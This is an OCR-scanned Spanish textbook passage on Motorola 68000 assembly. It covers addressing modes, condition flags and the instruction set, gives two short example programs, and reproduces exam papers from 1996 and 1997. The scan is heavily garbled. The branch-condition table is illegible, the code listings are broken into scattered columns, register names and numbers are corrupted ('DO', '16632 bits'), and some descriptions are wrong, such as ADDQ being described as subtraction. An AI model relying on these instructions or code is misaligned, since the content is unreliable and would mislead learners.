Ejemplo: ADD.B (A0),D6 suma el contenido de la posición de memoria (byte) cuya dirección está en AO al 
registro D6, guardando el resultado en este último. 


e b) Direccionamiento relativo a registro con posincremento: incrementa en una cantidad de memoria, según 
sea el tamaño del operando (1 para B, 2 para W y 4 para L), después de traer el contenido de la posición de 
memoria indicada por el registro de direcciones. 

Ejemplo: MOVE.W (A0)+,DO copia en DO el contenido de la posición de memoria direccionada por AO y luego 
incrementa en 2 el contenido de AO. 


e Cc) Direccionamiento relativo a registro con predecremento: Decrementa en una cantidad de memoria, 
según sea el tamaño del operando, el registro de direcciones y trae despues el contenido de la posición de 


memoria cuya dirección es el nuevo valor de dicho registro. 
Ejemplo: MOVE.B -(A0),DO decrementa en uno el contenido del registro AO y luego copia en DO el contenido 
de la nueva posición de memoria direccionada por AO. 


e d) Direccionamiento relativo a registro con desplazamiento: El contenido de la posición de memoria cuya 
dirección viene dada por la suma del valor del registro de direcciones y una cantidad fija denominada 
desplazamiento, pudiendo ser este positivo o negativo y su valor viene condiciondo por el tamaño del 
operando. 

Ejemplo: MOVE.L N(A0),D1 copia en el registro D1 el contenido de la posición de memoria cuya dirección 
viene dada por la suma de N multiplicado por 4(L) al contenido de AO. 


e e) Direccionamiento relativo a registro con índice: Este modo de direccionamiento es la extensión natural 
del anterior, ya que permite usar desplazamientos variables, utilizando como desplazamiento el resultado de 
sumar un número fijo al contenido de un registro de datos denominado registro índice. 

Ejemplo: MOVE.B 4(A0,D1), DO copia en el registro DO el contenido de la posición de memoria cuya dirección 
es el resultado de sumar el número 4, el contenido del registro AO y el contenido del registro D1. Este modo 
de direccionamiento no altera el registro de direcciones ni el registro índice. 


e f) Direccionamiento relativo al contador de programa con desplazamiento: Cuando es necesario hacer 
referencia a un operando relativo a la posición de la proxima instrucción que va a ser ejecutada. 

Ejemplo: MOVE.B 24(PC),DO copia en el registro DO el contenido de la posición de memoria cuya dirección 
es la suma de 24 y el valor del contador del programa. 


e gy) Direccionamiento relativo al contador de programa con índice: Utiliza como desplazamiento el resultado 
de sumar un número fijo al contenido de un registro de datos. 

Ejemplo: MOVE.B 24(PC,DO0),D1 copia en el registro D1 el contenido de la posición de memoria cuya 
dirección es el resultado de sumar el número 24, el contador de programa y el contenido del registro DO. 


4.- Formatos de instrucciones 


Los formatos empleados para las instrucciones utilizan una o más palabras de 16 bits. La primera palabra 
especifica el código de la operación y en muchos casos la dirección de un operando. Las especificaciones para 
completar los operandos, cuando no es suficiente con una palabra van a continuación de la primera palabra. Cada 
operando utilizará como máximo dos palabras de ampliación, equivalente a una palabra larga, después de la del 
código de operación, por lo que la instrucción más larga del Motorola 68000 ocupa 5 palabras (10 bytes), siendo 1 
para el código de instrucción, 2 palabras de ampliación para el operando origen, y 2 palabras de ampliación más para 
el operando destino. 

La información que identifica la situación exacta del operando, denominada dirección efectiva, se codifica en los 
formatos de instrucción mediante dos campos, siendo uno el modo de direccionamiento (MD) y el otro el de registro. 
Cada campo tiene un tamaño de 3 bits y se incluyen en la primera palabra de instrucción. El campo MD identifica el 
modo de direccionamiento empleado y el campo CR indica el registro empleado para obtener la dirección del 
operando. A veces se utilizan las palabras de ampliación ya que la dirección efectiva requiere incluir más información 
sobre la situación del operando en la palabra de instrucción. 


5.- Instrucciones condicionales 


Al realizar operaciones matemáticas existe la posibilidad de desbordamiento, por lo que se realiza un test 
automáticamente, quedando el resultado almacenado en un registro de control, dedicado especialmente a tal efecto, 
denominado registro de código de condición (CCR), pudiendose leer mediante la instrucción MOVE. Este registro 


consta de 5 flags que se almacenan en los 5 bits menos significativos del registro de estado (SR). 
Estos 5 bits tienen las siguientes denominaciones, ordenadas desde el bit menos significativo: 


- C indicador de acarreo o carry flag: indica el valor del bit de acarreo de la posición más significativa del 
resultado de una operación, poniendose a 1 si existe desbordamiento. 

- V indicador de desbordamiento o overflow flag: indica si en el resultado de una operación en complemento a 2 
existe desbordamiento, poniendose a 1. 

- Z es el indicador de cero o zero flag, poniendose a 1 cuando sea 0 el resultado de una operación aritmetica o 
lógica. 

- N es el indicador de número negativo o negative flag, poniendose a 0 si es positivo y a 1 si es negativo el signo 
del resultado de una operación en complemento a 2. 

- X es el indicador extendido o extended flag que funciona de la misma manera que C, pero unicamente con 
operaciones aritméticas o de desplazamiento. 


6.- Entrada/Salida 


Los computadores disponen de unos registros especiales, denominados puertos de E/S o 1/O en inglés para poder 
comunicarse con el exterior. El Motorola 68000 consta de tres puertos de este tipo en las siguientes direcciones de 
memoria: 

- FFFO0O de E 
- FFFO02 de S 
- FFFO0O4 de E/S 


7.- Gestión de Subrutinas 


Una subrutina es un conjunto de instrucciones que realizan una tarea concreta, que no puede ser ejecutada 
directamente sino que debe ser llamada por un programa principal. Esta subrutina denominada también 
subprograma, procedimiento o simplemente rutina se comienza a ejecutar cuando es llamada por el programa 
principal, desde la primera instrucción. Cuando se ha llegado a la última instrucción, se vuelve a ejecutar la siguiente 
instrucción del programa principal anterior a la invocación de la subrutina. 

La gestión de las subrutinas se realiza mediante una estructura de almacenamiento de tipo de pila. El espacio en 
memoria que se reserva para la pila se define a partir de dos direcciones, la dirección de la posición inicial o fondo de 
la pila y la dirección de la posición máxima permitida o valor máximo que puede alcanzar la cima de la pila. 

El puntero de pila indica la posición de la cima de la pila, utilizando un registro de direcciones denominado SP 
(stack pointer) y que es el A7. 


Capitulo 6 


Instrucciones en ASEMBLER Motorola 68000 


A continuación se desarrollarán las instrucciones del Motorola 68000, agrupadas según la función básica 
que realizan, estudiando la operación que realizan, su sintaxis, sus campos y algunos ejemplos. 


1.- Instrucciones de transferencias de datos 
2.- Instrucciones aritméticas 

3.- Instrucciones lógicas 

4.- Instrucciones de desplazamiento y rotación 
5.- Instrucciones de manipulación de bits 

6.- Instrucciones de operación en código BCD 
7.- Instrucciones de ramificación y salto 

8.- Instrucciones de manejo de subrutinas 


1.- Instrucciones de transferencias de datos 


El conjunto de estas instrucciones permite el movimiento de datos entre registros de la CPU, entre 
registros y memoria y entre posiciones de memoria. Estas son las siguientes: 


MOVE: realiza la transferencia de un dato desde fuente a destino. Modifica el CCR de forma que refleja el 
signo del dato movido y el hecho de que sea cero o no. Los flags C y V se ponen a cero y el flag X no se 
modifica. También el manejo de la pila se lleva a cabo mediante esta instrucción, utilizando direccionamiento 
indirecto con el registro A7 que actúa como puntero de pila. Para llevar un dato a la pila el direccionamiento 
es indirecto con predecremento, mientras que para extraerlo se emplea el indirecto con posincremento. 


MOVEA: (Move Adress) es una variante dedicada a la transferencia de direcciones. El tamaño del dato es de 
16632 bits. No modifica el CCR. 


MOVEQG: (Move Quick) tiene por finalidad la carga rápida de un registro de datos. 


MOVEMI!: (Move Múltiple) carga una serie de posiciones consecutivas de memoria en varios registros a la 
vez. No afecta al CCR. 

Ejemplo: MOVEM.L $1000,D0-D2/A2-A4/D7 copia los contenidos de las posiciones $1000, $1002, $1004,... 
$100C en los registros DO, D1, D2, D7, A2,A3 y A4 respectivamente. 


EXG y SWAP: la primera intercambia el contenido completo de dos registros de datos o de dirección, 
mientras que la segunda actúa sobre un único registro, siempre de datos, intercambiando sus palabras alta y 
baja. La realización de estas transferencias sin la existencia de estas instrucciones, requeriría la ejecución de 
tres instrucciones MOVE, y la utilización de otro registro o de la memoria como almacenamiento temporal. 


LEA y PEA: (Load Effective Adress y Push Effective Adress) determinan la dirección efectiva del operando 
fuente. La primera almacena la dirección efectiva calculada en el registro de direcciones que se especifique 
como operando destino y la segunda lo lleva a la pila. Ninguna de las dos afectan al CCR. 


LINK y UNLINK: facilitan las operaciones necesarias para el paso de parámetros a/de subrutinas a través de 
la pila, ofreciendo la ventaja de ser independiente de las áreas de memoria de datos de un programa, y de no 
necesitar el uso de etiquetas, ni de direcciones concretas para acceder a dichos parámetros, facilitando así la 


inclusión de las subrutinas en programas diferentes sin necesidad de hacer cambios en ellas. 

La instrucción LINK reserva una zona de memoria en la pila, desplazando el puntero de pila (SP) hacia 
direcciones menores en el valor que se indique. 

La instrucción UNLINK restablece la pila en la situación que se encontraba antes de la ejecución de LINK, 
cargando el puntero de pila con el contenido del registro de direcciones que se indica y a continuación extrae 
la palabra larga apuntada por SP y la lleva al registro de direcciones, quedando así restaurado. 


2.- Instrucciones aritméticas: 


El Motorola 68000 dispone de instrucciones para las 4 operaciones aritméticas, sobre operandos 
binarios, y suma y resta sobre datos codificados en BCD. Además de cambio de signo para ambos 
tipo de datos, instrucciones de comparación, extensión de signo y actualización de los códigos de 
condición (CCR) según el valor de un dato. 


ADD: realiza la suma de los operandos fuente y destino , quedando el resultado almacenado en destino. 
Modifica el CCR en función del resultado de la operación. 


ADDA: (Add Adress) realiza la operación de la suma, siendo el destino un registro de direcciones en vez de 
datos. 


ADD!I: (Add Inmediate) realiza la operación suma mediante direccionamiento inmediato. 


ADDOQ: (Add Quick) realiza la operación resta mediante direccionamiento inmediato siendo el destino menor 
o igual que 8. 


ADDX: (Add Extended) incluye en el resultado la suma del flag X, lo que facilita las operaciones con valores 
que superan la capacidad de los registros (precisión múltiple). 


SUB: (Substract) realiza la diferencia entre fuente y destino, depositando el resultado en destino. 


SUBA: (Substract Adress) realiza la operación de la resta, siendo el destino un registro de direcciones en vez 
de datos. 


SUBI: (Substract Inmediate) realiza la operación resta mediante direccionamiento inmediato. 


SUBOQ: (Substract Quick) realiza la operación resta mediante direccionamiento inmediato siendo el destino 
menor o igual que 8. 


SUBX: (Substract Extended) incluye en el resultado la resta del flag X, lo que facilita las operaciones con 
valores que superan la capacidad de los registros (precisión múltiple). 


MULS y MULU: (Multiply Signed y Multiply Unsigned) realizan la multiplicación sobre datos de 16 bits, 
generando un resultado de 32 bits, siendo el destino un registro de datos. Los flags C y V siempre quedan a 
O y el flag X no se modifica, reflejando el resultado de la operación los flags Z y N. 


DIVS y DIVU: (Signed y Unsigned) realizan la división de un dato de 32 bits (en destino) por otro de 16 bits 
(en fuente), generando dos resultados de 16 bits: el cociente y el resto, siendo obligatorio que el destino sea 
un registro de datos. El cociente se guarda en los 16 bits menos significativos y el resto en los 16 bits más 
significativos del registro destino. Ambas instrucciones ponen el flag C a 0, y el flag X no se modifica. Puede 
producirse desbordamiento si el divisor es pequeño, reflejandose en el flag V. Los flags N y Z son 


modificados reflejando el resultado de la operación. 


CMP: (Compara) las instrucciones de comparación efectúan la substracción destino-fuente pero la diferencia 
no se lleva a ningún destino, limitandose a afectar a los flags N, Z, V y C, de forma que se puedan comprobar 
diversas relaciones entre los datos que se comparen con el fin de producir ramificaciones en el programa. 


CMPA: (Compare Adress) utiliza como destino un registro de direcciones. 


CMPI: (Compare Inmediate) utiliza direccionamiento inmediato para fuente. Para el operando destino puede 
utilizar todos los modos salvo direccionamiento directo a registro de direcciones, indirectos con 
predecremento o posincremento y los relativos a PC. 


CMPM: (Compare Memory) compara dos datos en memoria con direccionamiento indirecto con 
posincremento facilitando así la comparación de bloques de memoria. 


CLR: (Clear) carga un cero binario en el operando destino poniendo los flags Na0,Za1,Va0yCa0. 


NEG: (Negate) esta instrucción devuelve el complemento a 2 del operando y esto supone el cambio 
aritmético de signo. Afecta a todos los flags del CCR. 


NEGX: (Negate Extended) facilita el cambio de signo de valores de precisión múltiple. 


EXT: (Extend) cuando se quiere ampliar la longitud de un dato con signo, por ejemplo de byte a palabra o de 
palabra a palabra larga , sin alterar su valor, el dato original debe mantenerse en el byte o palabra de menor 
peso, y el byte o palabra que se añade debe tener todos sus bits con el mismo valor que el bit de signo del 
dato original, recibiendo esta operación el nombre de extensión de signo. 


3.- Instrucciones lógicas: 


El Motorola 68000 dispone de cuatro instrucciones que realizan funciones lógicas, que actúan bit a bit sobre datos 
de 8, 16, ó 32 bits y cuatro para manejar bits individuales sobre datos de 8 ó 32 bits. 


AND: es la Y lógica. Admite todos los modos de direccionamiento para el operando fuente menos 
direccionamiento directo a registro de direcciones, mientras que el operando destino admite también todos 
menos los direccionamientos relativos a PC. 


AND!: realiza la misma función que AND, pero su direccionamiento es inmediato en el operando fuente y 
todos menos el direccionamiento directo a registro de direcciones y relativos a PC. 


EOR: es el O exclusivo. Admite únicamente el direccionamiento directo a registro de datos para el operando 
fuente, mientras que el operando destino admite también todos menos los direccionamientos directo a 
registro de direcciones y los relativos a PC. 


EOR!I: realiza la misma función que EOR, pero su direccionamiento es inmediato en el operando fuente y 
todos menos el direccionamiento directo a registro de direcciones y relativos a PC. 


NOT: complementación lógica. 


OR: es la O lógica. Admite todos los modos de direccionamiento para el operando fuente menos 
direccionamiento directo a registro de direcciones, mientras que el operando destino admite también todos 


menos los direccionamientos relativos a PC y directo a registro de direcciones. 


ORI: realiza la misma función que OR, pero su direccionamiento es inmediato en el operando fuente y todos 
menos el direccionamiento directo a registro de direcciones y relativos a PC. 


TST: (Test) comprueba un operando. Los flags V y C se ponen a 0. 


Scc : compruba los códigos de condición y pone a 1 el operando. Es de tamaño byte. 


4.- Instrucciones de desplazamiento y rotación: 


Se caracterizan por desplazar o rotar el operando bit a bit a la derecha o a la izquierda. El operando destino, 
que es el afectado por el desplazamiento o por la rotación siempre será un registro de datos. 


ASL: (Arithmetic Shift Left) desplaza a la izquierda los bits del operando destino. El número de 
desplazamientos viene indicado por el operando origen. El flag V se pone a 1 si el bit más significativo 
cambia en algún momento y C es el valor del último bit desplazado fuera del operando destino. 


ASR: (Arithmetic Shift Right) desplaza a la derecha los bits del operando destino. El número de 
desplazamientos viene indicado por el operando origen. El flag V se pone a 0, y el C es el valor del último bit 
desplazado fuera del operando destino. 


LSL: (Logical Shift Left) es el desplazamiento lógico a la izquierda. El número de desplazamientos viene 
indicado por el operando origen. El flag C es el valor del último bit desplazado fuera del operando destino. 


LSR: (Logical Shift Right) es el desplazamiento lógico a la derecha. El número de desplazamientos viene 
indicado por el operando origen. El flag C es el valor del último bit desplazado fuera del operando destino. 


ROL: (Rotate Left) rota a la izquierda los bits del operando destino. El número de desplazamientos viene 
indicado por el operando origen. El flag C es el valor del último bit desplazado fuera del operando destino. 


ROR: (Rotate Right) rota a la derecha los bits del operando destino. El número de desplazamientos viene 
indicado por el operando origen. El flag C es el valor del último bit desplazado fuera del operando destino. 


ROXL: (Rotate with Extended Left) rotación a la izquierda con extensión. El número de desplazamientos 
viene indicado por el operando origen. El flag C es el valor del último bit desplazado fuera del operando 
destino. 


ROXR: (Rotate with Extended Right) rotación a la derecha con extensión. El número de desplazamientos 
viene indicado por el operando origen. El flag C es el valor del último bit desplazado fuera del operando 
destino. 


SWAP: intercambia el contenido de los 16 bits más significativos con el de los 16 menos significativos, ya 
que los operandos son de tamaño palabra. Los flags V y C se ponen a 0. 


5.- Instrucciones de manipulación de bits: 


El Motorola 68000 permite comprobar, poner a cero , poner a uno e invertir los bits individuales de un valor 
entero. 


BTST: (Bit Test) sirve para comprobar el estado de un bit concreto de destino. Actualiza el flag Z en función 
del valor del bit indicado en la instrucción (Z=1 si el bit es cero). Admite el direccionamiento inmediato y el 
directo a registro de datos en el operando fuente y en el operando destino todos menos el directo a registro 
de direcciones. 


BCLR: (Bit Clear) pone a 0 el bit indicado. Actualiza el flag Z enfunción del valor original del mismo, 
poniendolo posteriormente a cero. 


BSET: (Bit Set) igual que BCLR, pero poniendo el bit a 1. 


BCHG: (Bit Change) en primer lugar actualiza el flag Z en función del valor del bit indicado y luego 
complementa el bit, es decir lo pone en el valor (0 ó 1) contrario al original. 


6.- Instrucciones de operación en código BCD: 


De la misma manera que el Motorola 68000 opera con enteros , también permite programar la suma y la 
resta en código BCD. 


ABCD: suma fuente al destino. 
NBCD: niega el destino. 


SBCD: resta fuente al destino 


7.- Instrucciones de ramificación y salto: 


Este microproceador incorpora varios mecanismos para poder realizar instrucciones típicas de los lenguajes 
de alto nivel, como pueden ser los bucles o las instrucciones de condición, siendo el más elemental la 
instrucción de ramificación, que utiliza como operando una etiqueta, y que sirve para hacer que la próxima 
instrucción que se ejecute sea la que tenga dicha etiqueta. Cuando el procesador se encuentra con esta 
instrucción, sencillamente carga la etiqueta en el contador de programa, por lo que la etiqueta es la dirección 
de donde debe cargarse la próxima instrucción que vaya a ejecutarse. 


Bcc : (Branch on condition code) utilizan un único argumento que indica la dirección de la siguiente 
instrucción en el caso de que se cumpla la condición indicada por cc. Utiliza siempre direccionamiento 
relativo al contador de programa. cc representa dos letras variables detalladas en la siguiente tabla: 


NOMBRE CONDICIÓN DE RAMIFICACIÓN 


| BEQ | ETIQUETA 


E NE | ETIQUETA 
| BCS | ETIQUETA 5 
| BCG | ETIQUETA (C”) 


| BHI- [ETIQUETA ¡GN (2) 

| BLS [ETIQUETA]  (C)+(Z) | 
| BMI [ETIQUETA | (N) 
| BPL. [ETIQUETA] (NN | 
| BVS [ETIQUETA | AV) | 
| BvC [ETIQUETA] (VW 
| BGT [ETIQUETA [(2) -[[(N) - (V)] +[(N) - (WT 
| BGE [ETIQUETA | — [(N)-(WI+[N)-(WT 
| BLT— [ETIQUETA EN) - (197 + [N)'- (V)] 
[BLE [EMQUETA AO MANO 


DBcc: (Decrement and Branch on Condition Code) facilita la realización de bucles en un programa, y tiene 
dos argumentos siendo el primero un registro de datos y el segundo un desplazamiento de 16 bits respecto al 
PC. Su funcionamiento se puede detallar a continuación: 


1* Comprueba la condición cc, si se cumple, pasa a ejecutar la instrucción siguiente (secuencia 
normal del programa) y en caso de estar realizando un bucle se saldría del mismo. 

2* Decrementa el contenido del registro de datos. 

3* Si el contenido del registro es -1, se ejecuta la instrucción siguiente (salida del bucle) 

4* Modifica el PC con el desplazamiento indicado (salta al comienzo del bucle). 


BRA: (Branch) utiliza direccionamiento relativo al PC, su único argumento es el desplazamiento de 8 ó 16 bits que se 
suma (con signo) al PC y se obtiene la dirección de la siguiente instrucción a ejecutar. Con desplazamiento corto (8 bits) 
lossaltos máximos que se pueden realizar son -128 y +127. Con desplazamiento largo ( 16 bits) los saltos máximos son - 
32.768 y +32.767. 


JMP: (Jump) utiliza direccionamiento absoluto y su argumento es la dirección de comienzo de la siguiente 
instrucción a ejecutar y puede estar situada en cualquier parte del mapa de memoria. 


STOP: para la ejecución del pograma de forma controlada y en el punto deseado. 


NOP: (No Operation) no realiza absolutamente nada. Es una instrucción que no hace sino consumir tiempo, 
exactamente 4 ciclos de reloj. Puede parecer absurda la existencia de una instrucción así, pero tiene su 
justificación, como por ejemplo si se desea efectuar un pequeño retraso en la ejecución de un programa con 
el fin de sincronizar determinados acontecimientos, o cuando se desea reservar algunas posiciones del 
programa para poder intercalar nuevas instrucciones, etc. 


8.- Instrucciones de manejo de subrutinas: 


BSR y JSR: (Branch to Subrutine y Jump to Subrutine) el operando asociado con estas instrucciones debe 
ser la dirección de memoria en la que se comienza la subrutina, con direccionamiento absoluto para JSR, y 
relativo a PC para BSR. Al ejecutarse cualquiera de las dos instrucciones, se almacena automáticamente en 
la pila el valor del contador de programa en el momento anterior al salto, cuando su contenido apunta a la 
dirección de comienzo de la instrucción siguiente a JSR o BSR. 

La subrutina debe tener como última instrucción a ejecutar RTS (Return from Subrutine) o RTR (Return and 


Restore). Ambas recuperan de la pila el valor del contador del programa, lo que permite reanudar la 
ejecución del programa precisamente en el punto que había sido abandonado. La instrucción RTR también 
repone el CCR extrayendo una palabra de la pila inmediatamente antes de recuperar el PC. La subrutina 
debe llevar a la pila, justamente encima de las posiciones que contienen la posición de retorno, una palbra 
cuyos 5 bits menos significativos serán llevados al CCR al ejecutarse RTR, que puede ser una copia del CCR 


al entrar en la subrutina, o cualquier otro valor. 


1.- Una simple suma: 


Capitulo 7 


Programación en ASM Motorola 


Con este sencillo programa podremos ver como funciona el Asm68k, para realizar una sencilla suma: 


PRINCIPAL ORG 
MOVE.L 
MOVE.L 
MOVE.L 
ADD.L 

FIN MOVE.B 
TRAP 
END 


$1000 
$25,D0 
$12,D1 
DO,D2 
D1,D2 
$+228,D7 
$14 


2.- Prueba de la memoria RAM: 


¡comienza en la direccion $1000 
¡pone 25 en DO 

¡pone 12 en Di 

¿pone el contenido de DO en D2 
¿suma el contenido de D1 con D2 
¡finaliza la simulación 


Se pretende detectar fallos en la memoria RAM, teniendo conocimiento de la posición exacta en que se produce el 
fallo. Una memoria RAM averiada puede entregar, bien un 0, bien un 1 en el bit que esta fallando, por lo que 
debemos efectuar una doble comprobación: 


se escribe $00 en un byte 
se comprueba que se lee $00 
se escribe $FF en un byte 
se comprueba que se lee $FF 


Si las operaciones de lectura no proporcionan un dato igual al que previamente se ha descrito, se habrá detectado un 
fallo. Esto se puede comprobar con el siguiente programa. 


Queda pendiente el desarrollo de una subrutina, llamada aviso. 


Longitud 
Dirlnic 
main 


final 


absolute 
org 

EQU 
EQU 
move.w 
move.l 
bsr 
bra.s 


VERMEM.ASM 


Verificación de un bloque de memoria 


$25000 

$FFF 

$26000 
HtHLongitud,DO 
fDirlnc,A1 
VerMem 


¡tamaño del bloque a verificar 
¡dirección inicial del bloque 


¡llama a la rutina 
final 


* VerMem = Verifica el funcionamiento de un bloque de memoria 
* A1 = Dirección inicial del bloque de memoria 
* DO = Longitud en bytes de dicho bloque (Word) 

* Si hay fallo llama a una subrutina que genera un aviso. 

* La dirección que produce el fallo es el contenido de A1 al hacer la llamada. 


VerMem 


fallo1 
fallo 


salir 


move.w 
tst.b 
bne 
move.b 
cmpi.b 


bne 
dbf 
bra 
subq.! 
jsr 
addq.| 
dbf 


rts 
end 


H0,(A1) 
(A1) 

fallo 
H$FF,(A1) 
H$FF,(A1)+ 


fallo1 
DO,VerMem 

salir 

11,A1 
Aviso 
+1,A1 
DO,VerMem 


¡Escribe un 0 en memoria 

¡Lee y compara 

¿Si no es cero, hay fallo 
¡Escribe $FF en memoria 

¡Lee, compara y apunta a 

¡la siguiente posición 

¡Si no es $FF, hay fallo 

¡Repite hasta completar bloque 


¡A1=Dirección de fallo 
¡Siguiente dirección a verificar 


¡Actualiza n2ordm; de posiciones y 
sino era la última continua 


Capitulo 8 


Examenes 


Asignatura: ESTRUCTURA Y TECNOLOGIA DE COMPUTADORES | 


Tipo examen: C 
Fecha: 9-Septiembre-1997 


TEST (4 puntos) 
1.- Indicar cual de las siguientes afirmaciones en relación con la descripción funcional de un computador es CIERTA: 


a) La Unidad de Control de un computador se encuentra formada por dos elementos funcionales básicos: el controlador y 
la interfase. 

b) Existen tres grupos básicos de elementos funcionales en un computador: los de almacenamiento, los de operaciones y 
los de búsqueda. 

c) Cada operación elemental comprende un conjunto formado por uno o más fases de instrucción. 

d) Habitualmente aparecen tres buses en la estructura básica de cualquier computador: el bus de datos, el bus de 
direcciones y el bus de control. 


2.- Los códigos alfanuméricos más usuales se caracterizan en general por: 


a) Incluyen todos los símbolos que aparecen en el teclado de un computador. 

b) Utilizan un sistema de codificación que suele ser por campos. 

c)  Emplean un número de bits para codificar un carácter que suele estar entre 16 y 32. 
d)  Excluir, siempre que sea posible, la representación de las letras mayúsculas. 


3.- Indique cual de los siguientes NO se corresponde con ninguno de los grupos de instrucciones establecidos en la clasificación 
de Fairclough: 


a) Movimientos o transferencias de datos. 
b)  Aritméticos. 

c) De operaciones en código BCD. 

d) De bit. 


4.- El dispositivo que se utiliza para introducir imágenes contenidas en un plano, tales como dibujos y fotografías, en la memoria 
de un computador se denomina: 


a) Scamner. 

b) Tableta digitalizadora. 
c) Lápiz óptico. 

d) Modem. 


5.- Los denominados computadores sistólicos son un caso especial de arquitectura: 


a)  MISD. 
b)  SISD. 
c)  MIMD. 
d)  SIMD. 


6.- Indique cual de los siguientes bloques NO forma parte de la estructura básica de un computador analógico: 


a) Unidad de Control. 

b) Unidad Aritmético Lógica. 
c) Bloque de cálculos. 

d) Panel de control. 


7.- Indique cual de los siguientes NO pertenece al conjunto de modos de direccionamiento del M68000: 
a) Relativo a registro con postincremento. 
b) Relativo a registro con índice. 
c) Mediante registro con índice. 
d) Mediante registro. 


8.- Cuando el traductor permanece en el propio computador que ejecuta el programa ejecutable se denomina: 


a) Ensamblador monofásico. 
b) Ensamblador residente. 

c) Ensamblador cruzado. 

d) Macroensamblador. 


9.- De los sistemas de numeración posicional de dígitos con signo se puede decir: 


a) Para representar cantidades tanto positivas como negativas es preciso añadir un signo al número. 

b) Cumplen el teorema fundamental de la numeración y por tanto, para una cantidad dada, sólo existe una única 
representación posible. 

c) Se caracteriza por utilizar una base negativa. 

d) Una misma cantidad puede ser representada mediante distintas cadenas de dígitos. 


10.- Indique cual de las siguientes características NO se corresponde con el direccionamiento indirecto: 


a) Nose requieren cálculos previos para conocer la dirección final. 

b) Son necesarios dos ciclos de memoria (aparte del de la fase de búsqueda) para acceder al objeto. 

c) Permite una gran capacidad de direccionamiento al poderse utilizar todos los bits de la palabra de memoria como 
dirección. 

d) La instrucción contiene la dirección de memoria exacta sin compactar en que se encuentra el objeto. 


PROBLEMA 1 (2 puntos) 
1.- (1 punto) Codificar en el formato de coma flotante estándar IEEE 754 de 32 bits el número decimal -2'5675 * 1015, 


2.- (1 punto) Determinar la cantidad decimal que representa la combinación hexadecimal B7890000, suponiendo que se trata de 
un número codificado en el mismo estándar IEEE 754 de 32 bits. 


PROBLEMA 2 (4 puntos) 


Diseñar una subrutina en ensamblador del M68000 para determinar si un año es o no bisiesto. Un año puede codificarse como un 
número entero sin signo en 16 bits. Como se sabe, un año es bisiesto si es divisible entre 4 pero no entre 100, excepto aquellos 
años que son divisibles entre 400, que sí son bisiestos. 

La subrutina recibirá como parámetro el año en cuestión en la palabra menos significativa del registro D1, y devolverá en el 
registro DO un valor igual a 1 si el año es bisiesto, e igual a 0 si no lo es. 

Seguir el procedimiento indicado a continuación: 


( 

.- (0'5 puntos) Realizar una descripción textual del algoritmo propuesto (máximo 10 líneas). 
(1 punto) Describir por pasos el algoritmo propuesto, indicando las constantes y las variables intermedias utilizadas. 
( 


INGENIERÍA TÉCNICA en INFORMÁTICA de SISTEMAS y de GESTIÓN 
ASIGNATURA: ESTRUCTURA Y TECNOLOGÍA DE COMPUTADORES I 


CURSO: 95/96 FECHA: 30 de Enero de 1996 HORA: 11.30. DURACIÓN TOTAL: 2 horas 
CÓDIGO CARRERA: CÓDIGO ASIGNATURA: CONVOCATORIA: FEBRERO 1*PP. TIPO DE EXAMEN: 
A 
SISTEMAS= 40 SISTEMAS= 104 SEMANA: 1? SEMANA 
GESTIÓN = 41 GESTIÓN= 104 


ES NECESARIO ENTREGAR ESTA HOJA DE ENUNCIADOS. 


MATERIAL PERMITIDO DURANTE LA REALIZACIÓN DEL EXAMEN: 


* Addenda de Estructura y Tecnología de Computadores I. 
* Calculadora no programable. 


PREGUNTAS TIPO TEST (puntuación máxima: 4 puntos). 
El test es ELIMINATORIO. Mínimo necesario para aprobar el test: 6 aciertos. 
La solución a las preguntas del test se marcará en el espacio RESPUESTAS en el reverso de esta hoja. 
Sólo hay una respuesta correcta en cada pregunta. 
LAS RESPUESTAS EQUIVOCADAS O EN BLANCO NO PENALIZAN. 


1. La conversión de una señal digital en analógica admite: 
a) Una única solución. 

b) Un número finito de soluciones. 

c) Infinitas soluciones. 

d) Ninguna de las anteriores es cierta. 


2. ¿Qué es el rango de un sistema de representación? 

a) La cantidad obtenida de restar los valores extremos representables en el mismo. 
b) El número de valores diferentes que permite representar. 
c) El conjunto de cantidades representables en el mismo. 
d) El número de valores diferentes representables sin contar el signo. 


3. Los códigos de corrección de errores basados en la repetición de la información un cierto número de veces son códigos: 
a) De paridad. 
b) De Hamming. 
c) Mayoritarios. 

d) Diferenciales. 


4. Indicar cuál de las siguientes afirmaciones relativas a la ejecución de instrucciones de un computador es falsa: 
a) Cada instrucción se ejecuta realizando una secuencia de operaciones elementales más rudimentarias. 

b) Cada operación elemental requiere la activación de una o varias señales de control. 

c) En cada período de reloj, el secuenciador determina qué señales de control permanecen activas. 

d) Todas las operaciones elementales tienen una duración igual a un ciclo de reloj. 


5. Cuál de las siguientes afirmaciones es falsa: 

a) El direccionamiento indexado se utiliza principalmente para recorrer estructuras de datos de tipo vector o tabla. 

b) El direccionamiento con preincremento es una combinación del modo indirecto e indexado. 

c) En el direccionamiento relativo a pila el puntero se encuentra en un registro específico del computador denominado puntero de pila (PP). 
d) En el direccionamiento relativo al contador de programa el objeto se encuentra próximo a la zona de programa. 


6. El juego de instrucciones de un computador es completo cuando: 
a) Contiene instrucciones de todos los tipos establecidos en la clasificación de Fairclough. 
b) Con él se puede calcular cualquier tarea computable en un tiempo mínimo. 


c) Consigue una alta velocidad de cálculo sin complicar en exceso la U.C.P. 
d) Ninguna de las anteriores. 


7. En un disco flexible: 

a) Las pistas exteriores contienen más datos que las interiores, pues disponen de mayor longitud de grabación. 

b) Las distintas pistas tienen diferente número de sectores, según la distancia a que se hallan del centro. 

c) Los datos grabados en una pista exterior están a mayor distancia entre sí que los grabados en una pista más interior. 


d) Para que la cabeza lectora lea un dato ubicado en una posición determinada, ha de leer previamente todos los datos que están grabados delante 
de él en su misma pista. 


$. En relación a los anchos en un computador, puede afirmarse que: 

a) El ancho de banda de la memoria es el número de bytes que hay en una palabra de memoria. 

b) El ancho de palabra de un computador es el número de bits que procesa en paralelo el computador. 
c) El ancho de palabra de un computador es igual al ancho de banda de la memoria. 

d) El ancho de palabra de un computador coincide siempre con el ancho del bus de direcciones. 


9. Indicar cuál de las siguientes afirmaciones es cierta: 

a) El lenguaje ensamblador no puede considerarse un lenguaje simbólico. 

b) El lenguaje ensamblador es un caso típico de lenguaje orientado al problema. 

c) Una característica fundamental del lenguaje ensamblador es que permite la transportabilidad de programas entre diversos tipos de 
computadores. 

d) La misión de un lenguaje ensamblador es simplificar la programación de un determinado computador, manteniendo un control directo sobre la 
arquitectura del mismo. 


10. Un programa es autorreubicable cuando: 
a) Todos los direccionamientos que realiza son relativos. 
b) Todos los módulos que lo componen comienzan con una sentencia ORG. 


c) Sólo utiliza direcciones absolutas. 
